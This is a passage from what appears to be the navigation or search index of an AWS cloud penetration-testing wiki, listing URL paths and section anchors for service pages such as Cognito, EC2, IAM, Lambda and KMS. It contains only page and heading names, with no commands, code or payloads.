ger-acm-and-private-certificate-authority-pca.html#privesc","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#aws---cloudformation--codestar-enum","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#cloudformation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#codestar","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#privesc-1","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#aws---cloudhsm-enum","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#hsm---hardware-security-module","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#cloudhsm-suggestions","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#what-is-a-hardware-security-module","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#aws---cloudfront-enum","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#cloudfront","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#functions","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#aws---codebuild-enum","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#codebuild","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#githubgitlabbitbucket-credentials","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#aws---cognito-enum","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#cognito","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#user-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#identity-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#identity-pools---unauthenticated-enumeration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#user-pools---unauthenticated-enumeration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#privesc","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#persistence","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#cognito-identity-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#cognito-sync","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#tools-for-pentesting","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#accessing-iam-roles","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#unauthenticated","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#enhanced-vs-basic-authentication-flow","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#authenticated","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#cognito-user-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#potential-attacks","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#tools-for-pentesting","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#registration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#verifying-registration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#privilege-escalation--updating-attributes","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#recoverchange-password","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#authentication","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#admin_no_srp_auth--admin_user_password_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user_password_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user_srp_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#refresh_token_auth--refresh_token","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#custom_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#extra-security","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#advanced-security","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#mfa-remember-device","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user-pool-groups-iam-roles","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#aws---datapipeline-codepipeline--codecommit-enum","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#datapipeline","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#privesc","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#codepipeline","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#privesc-1","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#codecommit","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration-2","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#references","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#aws---directory-services--workdocs-enum","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#directory-services","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#options","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#lab","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#login","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#privilege-escalation","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#using-an-ad-user","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#sharing-ad-from-victim-to-attacker","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#sharing-ad-from-attacker-to-victim","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#workdocs","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#aws---documentdb-enum","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#documentdb","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#nosql-injection","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#documentdb-1","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#aws---dynamodb-enum","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#dynamodb","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#encryption","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#backups--export-to-s3","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#gui","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#dynamodb-injection","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#sql-injection","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#nosql-injection","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#raw-json-injection","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#property-injection","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#aws---ec2-ebs-elb-ssm-vpc--vpn-enum","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#vpc--networking","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ec2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#instance-profiles","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#metadata-endpoint","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#privesc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ebs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#difference-ami--ebs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#privesc-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ssm","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#privesc-2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#perssistence","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#elb","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#launch-templates--autoscaling-groups","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-3","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#nitro","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-4","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#local-enumeration","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#references","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#aws---nitro-enum","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclaves","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclave-cli-installation","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclave-images","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#run-an-image","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#enumerate-enclaves","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#terminate-enclaves","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsocks","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-serverlistener","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-client","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-proxy","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclave-atestation--kms","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#pcr-bypass","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#aws---vpc--networking-basic-information","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#aws-networking-in-a-nutshell","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#subnets","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#route-tables","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#acls","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#security-groups","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#elastic-ip-addresses","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#connection-between-subnets","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpc-peering","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpc-flow-logs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#basic-aws-vpn-components","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#site-to-site-vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#client-vpn","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#aws---ecr-enum","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#ecr","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#unauthenticated-enum","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#aws---ecs-enum","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#ecs","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#sensitive-data-in-task-definitions","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#aws---eks-enum","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#eks","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#aws---elastic-beanstalk-enum","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#application--environments","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#2-types-of-environments","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#security","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#exposure","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#aws---elasticache","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#elasticache","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#privesc-todo","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#aws---emr-enum","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#emr","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#aws---efs-enum","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#efs","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#network-access","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#mount-efs","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#iam-access","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#access-points","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#efs-ip-address","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#persistence","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#aws---eventbridge-scheduler-enum","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#eventbridge-scheduler","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#types-of-schedules","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#targets","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#privesc","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#aws---kinesis-data-firehose-enum","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#kinesis-data-firehose","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#post-exploitation--defense-bypass","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehosedeletedeliverystream","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehoseupdatedestination","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehoseputrecord--firehoseputrecordbatch","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#aws---iam-identity-center--sso-enum","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#permissions-brute-force","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#privilege-escalation","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-post-exploitation","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-persistence","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-identity-center","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#connect-via-sso-with-cli","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#local-enumeration","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#unauthenticated-access-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#privilege-escalation-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#aws---kms-enum","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#kms---key-management-service","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#key-policies","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#key-administrators","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#rotation-of-cmks","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#other-relevant-kms-information","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#aws---lambda-enum","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-aliases-weights","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#resource-policies","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-database-proxies","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-efs-filesystems","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-layers","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-extensions","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#invoke-a-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#aws---lightsail-enum","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#aws---lightsail","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#analyse-snapshots","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#metadata","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#amazon-macie","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#macie","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#alert-system","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#dashboard-features","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#user-categorization","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#identity-types","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#data-classification","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#research-and-analysis","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#listing-findings-with-aws-console","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#revealing-secret","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---mq-enum","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#amazon-mq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#introduction-to-message-brokers","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---rabbitmq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---activemq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#aws---msk-enum","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#amazon-msk","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#types","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#kafka-iam-access-in-serverless","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#aws---organizations-enum","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#baisc-information","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#aws---redshift-enum","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#amazon-redshift","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#kms","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#cloudhsm","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#aws---relational-database-rds-enum","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#credentials","pentesting-cloud/a